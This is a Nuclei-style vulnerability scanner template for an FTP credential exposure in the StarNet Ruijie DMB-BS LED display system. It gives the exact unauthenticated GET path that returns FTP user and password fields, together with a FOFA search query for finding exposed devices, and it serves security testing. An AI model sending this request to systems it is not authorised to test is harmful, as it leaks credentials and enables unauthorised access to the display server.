id: starnet-dmb-bs-ftp-credentials

info:
  name: StarNet DMB-BS LED Display System FTP Credentials Exposure
  author: brucelsone
  severity: medium
  description: |
    The StarNet Ruijie DMB-BS LED Display System contains a security vulnerability in its taskexport interface that allows unauthorized access to FTP server credentials and connection parameters. This exposure enables potential attackers to gain unauthorized access to the FTP server, potentially compromising the integrity and content of the LED display system.
  reference:
    - https://www.ddpoc.com/DVB-2024-7055.html
    - https://blog.csdn.net/shelter1234567/article/details/145521914
  metadata:
    verified: true
    max-request: 1
    fofa-query: (app="STAR_NET-数字标牌系统" || -欢迎! -- BS3.2.02.38447- || icon_hash="-260118452")
  tags: starnet,ruijie,ftp,password,exposures

http:
  - method: GET
    path:
      - "{{RootURL}}/dmb/out/taskexport.jsp?taskcode"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains_all(body,'user','pwd')"
